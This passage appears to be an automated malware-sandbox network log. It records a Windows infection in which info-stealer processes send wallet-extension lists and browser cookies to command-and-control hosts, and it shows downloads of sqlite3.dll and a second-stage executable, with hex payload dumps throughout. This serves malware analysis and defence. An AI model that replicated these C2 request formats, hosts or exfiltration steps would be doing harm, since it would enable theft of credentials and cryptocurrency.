                                                                                                                                                                                                                                                Data Ascii: cG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2F
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.766455889 CET1236INData Raw: 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46
                                                                                                                                                                                                                                                Data Ascii: U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWN
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.766460896 CET248INData Raw: 63 47 56 76 61 32 4a 70 61 32 68 6d 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 46 79 64 47 6c 68 62 69 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 5a 69 5a 32 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d
                                                                                                                                                                                                                                                Data Ascii: cGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFR
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.767556906 CET1236INData Raw: 63 69 42 51 59 58 4e 7a 64 32 39 79 5a 43 42 4e 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d 74 6e 61 6d 46 6e 5a 32 68 75 62 6d 4e 71 61 32 68 6e 5a 32 52 6f 59 57 78 74 59 32 35 6d 61 32 78 72 66 44 46 38 4d 48 77 77 66 45 46 31 64 47
                                                                                                                                                                                                                                                Data Ascii: ciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHB
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.767662048 CET1236INData Raw: 61 47 52 6a 62 32 35 6b 59 6d 4e 69 5a 47 35 69 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44 42 38 55 6d 6c 7a 5a 53 41 74 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 6f 59 6d 4a 6e 59 6d 56 77 61 47 64 76 61 6d 6c 72 59 57
                                                                                                                                                                                                                                                Data Ascii: aGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.775559902 CET248INData Raw: 62 47 56 30 66 47 39 71 5a 32 64 74 59 32 68 73 5a 32 68 75 61 6d 78 68 63 47 31 6d 59 6d 35 71 61 47 39 73 5a 6d 70 72 61 57 6c 6b 59 6d 4e 6f 66 44 46 38 4d 48 77 77 66 46 42 31 62 48 4e 6c 49 46 64 68 62 47 78 6c 64 43 42 44 61 48 4a 76 62 57
                                                                                                                                                                                                                                                Data Ascii: bGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.957334042 CET544INData Raw: 5a 57 52 69 61 6d 6c 76 61 58 42 6e 62 47 64 6a 59 6d 4e 74 62 6d 4a 77 5a 32 78 70 62 32 5a 38 4d 58 77 77 66 44 42 38 56 47 39 75 61 32 56 6c 63 47 56 79 49 46 64 68 62 47 78 6c 64 48 78 76 62 57 46 68 59 6d 4a 6c 5a 6d 4a 74 61 57 6c 71 5a 57
                                                                                                                                                                                                                                                Data Ascii: ZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.965884924 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIID
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Content-Length: 268
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a
                                                                                                                                                                                                                                                Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="message"fplugins------JKECFCFBGDHIECAAFIID--
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.414239883 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:46 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Content-Length: 108
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                                Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:46.811480999 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----DBGIJEHIIDGCFHIEGDGC
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Content-Length: 6187
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.029835939 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:47 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.298403978 CET94OUTGET /68b591d6548ec281/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:48.743309021 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:48 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                                ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Content-Length: 1106998
                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                12192.168.2.449870185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:50.445488930 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 31
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 64 31 3d 31 30 31 34 37 39 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                Data Ascii: d1=1014794001&unit=246122658369
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:51.813105106 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:51 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                13192.168.2.44987731.41.244.11807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:52.343180895 CET62OUTGET /files/unique2/random.exe HTTP/1.1
                                                                                                                                                                                                                                                Host: 31.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:53.652544022 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:53 GMT
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                Content-Length: 1968640
                                                                                                                                                                                                                                                Last-Modified: Fri, 13 Dec 2024 11:52:30 GMT
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                ETag: "675c1ffe-1e0a00"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f8 9d 40 24 ab 9d 40 24 ab 9d 40 24 ab 83 12 a0 ab 81 40 24 ab 83 12 b1 ab 89 40 24 ab 83 12 a7 ab c5 40 24 ab ba 86 5f ab 94 40 24 ab 9d 40 25 ab f6 40 24 ab 83 12 ae ab 9c 40 24 ab 83 12 b0 ab 9c 40 24 ab 83 12 b5 ab 9c 40 24 ab 52 69 63 68 9d 40 24 ab 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0c de dd 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 b0 01 00 00 00 00 00 00 80 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 86 00 00 04 00 00 4a 38 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!J@$@$@$@$@$@$_@$@%@$@$@$@$Rich@$PELd@J8ZBn@h!x @T@.rsrch!@d@.idata B@ `) B@awzrkizhk@dziymjtbp@.taggant0"@
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:53.652574062 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:53.652585030 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:53.652596951 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:53.652610064 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:53.652621984 CET672INData Raw: af e6 00 81 10 86 b0 45 1b 03 1c 75 3f 48 04 a4 07 67 65 9b 8c 2c bd 73 51 82 9a ad f5 94 98 fd 49 b3 80 a0 ce e2 38 b7 f9 2e 67 c3 87 d5 8e 4d d1 06 b8 e6 f8 9f ab a9 c4 78 23 a3 97 c3 0c f2 a2 94 f2 51 15 5a 30 c6 51 8e c6 63 cb c8 67 68 a5 14
                                                                                                                                                                                                                                                Data Ascii: Eu?Hge,sQI8.gMx#QZ0QcghqiQHzXF!kF:Zv[Vae>e.V;T6Cwto{xy}ymT\^xBUs^1pp=^iKuA>;n+Rv}I}d
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:53.652688980 CET1236INData Raw: 97 4c 14 c2 e6 e4 45 4e 98 bc 81 d5 be 20 dc e4 24 a4 47 95 1a 5a 78 d8 89 d5 64 6b 91 86 2b f0 9c 8d 17 4c 97 a1 30 04 6d 83 18 e0 54 ad c5 3d 5a 9e 87 e5 6c 18 7b d9 60 9d df 45 5a 28 49 74 ba ad 35 f1 20 f2 4f 74 25 87 bd d3 69 a1 81 88 a8 91
                                                                                                                                                                                                                                                Data Ascii: LEN $GZxdk+L0mT=Zl{`EZ(It5 Ot%iIF7pIzh{#D]CB#5e~ [n\3Z-}}{_VW870PXdb2<}a<IWQp)1\]2+WuL.N
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:53.652699947 CET224INData Raw: 48 5c 24 d7 b1 2c 16 46 ae 8e 18 42 ac 55 8d 75 e8 42 19 ca a2 10 93 75 31 bc 28 55 13 08 29 ae af ec 2d de 85 65 09 4f 35 b1 44 01 dc ac 3a 4f fd 45 f5 5a a5 fb 00 e8 6d cf ba 98 9f 7c a7 da ff 7d b3 06 f0 28 b0 4b d5 93 31 06 6e cc 3f 03 aa 0b
                                                                                                                                                                                                                                                Data Ascii: H\$,FBUuBu1(U)-eO5D:OEZm|}(K1n?`iatwWlld8r_\9\Pg|H5c24xWjBVEwIC}W#l>*8UDD]=C+V"4LrL|<w=Q
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:53.652775049 CET1236INData Raw: df f8 ac 0b 85 ff 19 7e 6c 97 27 39 85 8b 11 c2 b2 06 20 ce 6f dd 96 46 9b ad 63 c4 84 b0 50 e5 42 45 6c 57 ce 90 a3 66 36 13 39 50 74 78 a3 74 87 22 6c 17 f8 9d 4f 3e f5 3a 59 70 41 70 80 89 29 84 5e 6d 2e e3 33 3b 4b 88 79 06 6d ac 04 ab 6d 8b
                                                                                                                                                                                                                                                Data Ascii: ~l'9 oFcPBElWf69Ptxt"lO>:YpAp)^m.3;Kymm3&s8HJ$5NDu=y3BI5RC2U!,Mmr=9 I3yQ78T}XO#5P]Tg2y(,bLXHM*D
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:53.652858973 CET224INData Raw: 43 7d 1a 6d 21 e3 a4 59 d9 09 a5 66 01 b4 56 51 ab 86 4d 5a 46 b0 88 9e 48 41 75 11 53 d6 19 53 41 8e 79 8f fe 7e 8c 8f 30 4d 16 c3 72 a1 fc 9b 45 f0 24 f2 4b 84 b3 dd cc fa 88 94 f7 f4 42 8a 90 3a 49 d6 dc 9f 18 79 f4 aa 15 68 8e d0 58 2c 5f 49
                                                                                                                                                                                                                                                Data Ascii: C}m!YfVQMZFHAuSSAy~0MrE$KB:IyhX,_I[kPgez;;ZT@6dyP&}h<W-+[A{((j}~)IBfYl$@d>[?;]M~Aj..ipAe<i~>k1;
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:53.772727966 CET1236INData Raw: d1 c3 2d 3e db 4d 24 c2 aa c8 6f 50 95 7a 88 a3 c2 8c f9 4a 22 c4 d3 f9 5a 55 15 fe 95 24 86 97 56 5c f5 79 f4 37 d2 d1 39 dc 72 0d cf af 68 3d 24 be 8a 28 85 fa f3 c2 af 27 07 c6 55 c4 2b e0 c9 1f 9a 92 99 1f 1c 71 1e ac 34 45 fa 7e a5 57 eb 7e
                                                                                                                                                                                                                                                Data Ascii: ->M$oPzJ"ZU$V\y79rh=$('U+q4E~W~S9-+K1Oe*"*nRtqDWuWWF|!V;?)JQqGp~#QM}d\'zzq[v8OT9f!q+r\5d6ljF+=6\Pd


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                14192.168.2.449905185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:59.690289021 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 31
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 64 31 3d 31 30 31 34 37 39 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                Data Ascii: d1=1014795001&unit=246122658369
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:01.056685925 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:00 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                15192.168.2.449916185.215.113.206807356C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:01.321939945 CET621OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCA
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------DGHJEHJJDAAAKEBGCFCA--
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:03.185211897 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:02 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:04.026237965 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JDGCFBAFBFHJEBGCAEGH
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Content-Length: 1451
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:04.026237965 CET1451OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63
